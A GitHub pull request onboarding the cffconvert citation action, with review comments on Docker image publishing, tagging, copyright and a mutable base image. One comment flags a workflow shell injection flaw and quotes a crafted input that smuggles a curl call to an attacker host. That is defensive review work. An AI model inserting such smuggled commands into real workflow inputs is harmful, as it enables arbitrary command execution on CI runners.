feat: Onboard citation-file-format/cffconvert-github-action action#1
feat: Onboard citation-file-format/cffconvert-github-action action#1anurag-stepsecurity wants to merge 1 commit into
Conversation
0fddc30 to
3e87539
Compare
Signed-off-by: Anurag Rajawat <anurag@stepsecurity.io>
3e87539 to
67c8414
Compare
PR ReviewAction TypeDocker-based action — uses a local ✅ Passed Checks
❌ Failed Checks
|
| description: "Validate CITATION.cff files, and convert to other citation formats." | ||
| name: cffconvert | ||
| runs: | ||
| image: Dockerfile |
There was a problem hiding this comment.
Failed check: Action must use a published Docker image
image: Dockerfile builds the Docker image locally on every action run. The requirement is to use a pre-built image published to the step-security org on GitHub Container Registry, tagged with only the major version:
| image: Dockerfile | |
| image: 'docker://ghcr.io/step-security/cffconvert-github-action:v2' |
The docker.yml workflow must also be updated to push this major-version tag alongside the full semver tag.
| uses: actions/checkout@v6 | ||
| - name: Validate tag format | ||
| run: | | ||
| TAG=${{ github.event.inputs.release_tag }} |
There was a problem hiding this comment.
Security: Shell injection vulnerability
TAG=${{ github.event.inputs.release_tag }} injects the raw workflow_dispatch input directly into the shell at YAML-evaluation time (before the shell runs). A crafted input such as v1.0.0; curl http://attacker.com would execute arbitrary commands.
Fix — reference the value through an environment variable instead:
| TAG=${{ github.event.inputs.release_tag }} | |
| RELEASE_TAG: ${{ github.event.inputs.release_tag }} |
| push: true | ||
| platforms: linux/amd64,linux/arm64 | ||
| tags: | | ||
| ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }} |
There was a problem hiding this comment.
Failed check: Docker image must be tagged with major version
Only the full semver tag is pushed here. A major-version alias (e.g., v2) must also be included so consumers (and action.yml's image: field) can pin to a stable major version without tracking individual patch releases:
| ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }} | |
| tags: | | |
| ghcr.io/${{ github.repository }}:${{ github.event.inputs.release_tag }} | |
| ghcr.io/${{ github.repository }}:v${{ steps.parse_version.outputs.major }} |
You will need an earlier step to extract the major version number from the tag (e.g., echo "$RELEASE_TAG" | cut -d. -f1 | tr -d v).
| same "printed page" as the copyright notice for easier | ||
| identification within third-party archives. | ||
|
|
||
| Copyright (c) 2026 StepSecurity |
There was a problem hiding this comment.
Failed check: Missing original author copyright
Only the StepSecurity copyright is present. The original author's copyright must also be included. Add the original copyright above this line:
| Copyright (c) 2026 StepSecurity | |
| Copyright (c) 2019 Netherlands eScience Center and University of Groningen (citation-file-format) | |
| Copyright (c) 2026 StepSecurity |
Adjust the year and exact entity name to match what the upstream project uses.
| @@ -0,0 +1,10 @@ | |||
| FROM python:3.13-alpine | |||
There was a problem hiding this comment.
Warning: Mutable base image tag
python:3.13-alpine is a floating tag that can be silently updated upstream, creating a supply-chain risk. Pin to a specific digest to make the build reproducible and auditable:
| FROM python:3.13-alpine | |
| FROM python:3.13-alpine@sha256:<digest> |
Retrieve the current digest with: docker inspect --format='{{index .RepoDigests 0}}' python:3.13-alpine
https://github.com/citation-file-format/cffconvert-github-action